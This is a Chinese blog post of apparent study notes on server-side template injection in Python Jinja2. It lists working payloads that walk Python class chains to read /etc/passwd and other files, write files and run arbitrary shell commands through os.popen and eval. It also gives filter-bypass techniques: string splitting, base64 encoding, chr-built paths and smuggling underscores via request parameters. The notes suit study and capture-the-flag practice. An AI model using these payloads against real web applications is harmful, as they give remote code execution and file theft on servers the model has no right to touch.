模板注入SSTI漏洞学习笔记

最新推荐文章于 2023-07-02 15:16:03 发布
最新推荐文章于 2023-07-02 15:16:03 发布
阅读量1.4k 收藏 7
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hauzhao/article/details/120441866
版权

目录

SSIT介绍

原理

一些常用的函数

写文件

任意命令执行

读取本级目录

os执行(任意命令执行)

eval,impoer等全局函数

python 3.7版本

命令执行

文件操作

windows下的os执行命令

绕过方法

拼接

编码

过滤[]

字典读取

过滤双下划线

参考文章

SSIT介绍

render_template函数的渲染出了问题,往往对用户输入的变量不做渲染,SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty twig,java的jade velocity。当这些框架对运用渲染函数生成html的时候会出现SSTI的问题。

原理

打开python输入

[].__class__.__base__.__subclasses__()

这就是[]对象继承基类的所有子类,然后在里面找到我们要用到的子类

一些常用的函数

读写文件都用到的是file函数,位置是第四十个

读取文件

().__class__.__bases__[0].__subclasses__()[40](r'C:\1.php').read()

xctf 进阶web Web_python_template_injection

[].__class__.__base__.__subclasses__()[40]('fl4g').read()

写文件

().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')

任意命令执行

().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").popen("ls /var/www/html").read()' )

读取本级目录

().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')

os执行(任意命令执行)

[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache下有os类,可以直接执行命令:
[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('id').read()

eval,impoer等全局函数

[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__下有eval,__import__等的全局函数,可以利用此来执行命令:
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('id').read()
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()

python 3.7版本

命令执行

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}

文件操作

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}

windows下的os执行命令

"".__class__.__bases__[0].__subclasses__()[118].__init__.__globals__['popen']('dir').read()

绕过方法

拼接

object.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')
().__class__.__bases__[0].__subclasses__()[40]('r','fla'+'g.txt')).read()

编码

().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').popen('ls').read()")
编码之后
().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['ZXZhbA=='.decode('base64')]("X19pbXBvcnRfXygnb3MnKS5wb3BlbignbHMnKS5yZWFkKCk=".decode('base64'))(可以看出单双引号内的都可以编码)


还可以使用rot13,16进制编码

过滤[]

getitem()

"".__class__.__mro__[2]
"".__class__.__mro__.__getitem__(2)

pop()

''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/etc/passwd').read()

字典读取

__builtins__['eval']()
__builtins__.eval()

先获取chr函数,赋值给chr,后面拼接字符串 

{% set
chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr
%}{{
().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(chr(47)%2bchr(101)%2bchr(116)%2bchr(99)%2bchr(47)%2bchr(112)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(119)%2bchr(100)).read()
}}

或者借助request对象:(这种方法在沙盒种不行,在web下才行,因为需要传参)

{{ ().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read() }}&path=/etc/passwd

PS:将其中的request.args改为request.values则利用post的方式进行传参 

过滤双下划线

{{
''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read()
}}&class=__class__&mro=__mro__&subclasses=__subclasses__

在url执行pay命令格式

eg:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='file' %}
{{ c("/etc/passwd").readlines() }}
{% endif %}
{% endfor %}

参考文章

SSTI入门详解_E1even的博客-CSDN博客_ssti

SSTI完全学习_Sea_Sand息禅-CSDN博客_ssti

花昭huazhao
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSTI漏洞基础解析
小王的储物间
02-14 511
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
SSTI模板注入
qq_74020399的博客
04-20 731
SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。
SSTI模板注入
ljj20020718的博客
06-02 294
SSTI注入形成示例如下:payload:{{config}}(用来测试是否存在SSTI注入SSTI基本的思路就是通过找到合适的魔术方法,一步步去执行,从而得到我们想要的结果。返回结果成功执行系统命令并显示whoami信息。一个简单的使用flask创建的web服务器程序。安全的flask程序编写如下。控制台下也会产生访问记录。
SSTI 模板注入
weixin_53150482的博客
07-18 1126
SSTI 模板注入
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 安全人才 威胁情报 安全建设 安全开发 解决方案
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入漏洞可能使网站遭受各种攻击,具体取决于所讨论的模板引擎以及应用程序使用它的方式。 在某些罕见情况下,这些漏洞不会带来真正的安全风险。 但是,在大多数情况下,服务器端模板注入的影响可能是...
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
White-box-pentesting:创建此实验室的目的是演示哈希传递,盲SQL和SSTI漏洞
05-10
白盒喷枪创建此实验室的目的是演示哈希传递,盲SQL和SSTI漏洞漏洞描述基于注册表单的二阶基于盲布尔的sql注入,如果为true,则会导致users_logs,所有日志都将显示,否则为空哈希中的管理员用户名和密码无法破解,...
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
SSTI模板注入总结
goddemon
12-23 1306
SSTI模板注入 原理:获取一个输入,然后再后端的渲染处理上进行语句的拼接,然后执行。(即典型漏洞存在于框架中的渲染函数生成html时) 典型针对网站模板引擎: Python的jinja2 mako tornado django Python的jinja2 mako tornado django 模板引擎:即引擎中具有一套生成html的程序,只需获取用户的数据,然后放在渲染函数中即可生成一个前端的html页面 分析学习: 常用方法 //获取基本类 ''.__class__.__mro__[1] {}.__c
ssti模板注入学习笔记
m0_73559432的博客
04-15 624
学习ssti模板注入笔记。课程是b站橙子老师的课,https://www.bilibili.com/video/BV1tj411u7Bx?p=22&vd_source=9f6c2d32d65865d972cf6825021e3b6f,讲的真的很详细,推荐听一听。
浅析SSIT模板注入
qq_51954912的博客
08-07 1226
文章目录前言一些模板payloadJinja2Twig判断引擎的方法题目实战[BJDCTF2020]Cookie is so stable[BJDCTF2020]The mystery of ip参考博客 前言 最近遇到两道关于SSIT模板注入的题,叙述原理需要扎实的python功底,我python贼fw,就题论题,说一下解题技巧吧。 一些模板payload Jinja2 python2_任意执行 #(system函数换为popen('').read(),需要导入os模块) {{''.__class__
SSIT模板注入
RuiLike的博客
07-02 410
存在这三种语法控制结构 {% %}变量取值 {{ }}注释 {# #}
适合小白学的基础知识—SSTI漏洞学习
HBohan的博客
07-30 987
SSTI 简介 MVC MVC是一种框架型模式,全名是Model View Controller。 即模型(model)-视图(view)-控制器(controller) 在MVC的指导下开发中用一种业务逻辑、数据、界面显示分离的方法组织代码,将业务逻辑聚集到一个部件里面,在改进和个性化定制界面及用户交互的同时,得到更好的开发和维护效率。 在MVC框架中,用户的输入通过 View 接收,交给 Controller ,然后由 Controller 调用 Model 或者其他的 Controller 进行处理.
SSTi模板注入漏洞
Aidang的博客
08-23 1621
1.SSTI含义 SSTI是一种注入类的漏洞,其成因也可以类比SQL注入。 SQL注入是从用户获得一个输入,然后用后端脚本语言进行数据库查询,利用输入来拼接我们想要的SQL语句。SSTI也是获取一个输入,然后在后端的渲染处理上进行语句的拼接执行。 但是和SQL注入不同的,SSTI利用的是现有的网站模板引擎,主要针对Python、PHP、JAVA的一些网站处理框架,比如Python的jinja2、mako、tornado、Django,PHP的smarty twig,java的jade velocity。当这
SSTI注入————php的SSTI
wwwwyyyrre的博客
06-04 842
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架SSTI漏洞大致可以分为三种类型————python中的ssti java中的ssti php中的ssti这里不细致介绍模板之类的内容 提供关于ssti注入的题 在题中理解 涉及的内容较多 这里提供一个大佬讲解的ssti的详细内容。
SSTI注入
weixin_45597678的博客
01-05 1367
文章目录1.概念1.1 什么是Flask1.2 SSTI注入的原理2.使用2.1 Flask框架的使用2.2 python内置方法介绍\__class__\__bases__\__mro__\__subclasses__()\__globals__2.3 SSTI漏洞利用3.题目实操考点进入题目尝试构造payload分析源代码考点1.subprocess.Popen的构造函数 1.概念 1.1 什么是Flask Flask是使用python编写的一个轻量级的web应用框架,模板引擎使用的是jinja2,遵循
ssti模板注入payload
最新发布
09-26
SSTI(服务器端模板注入)是指攻击者能够将恶意有效载荷注入到服务器端模板中,然后在服务器端执行该模板。攻击者利用模板引擎生成前端的HTML代码,通过将用户的数据放到渲染函数中来生成模板,最终将生成的HTML页面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值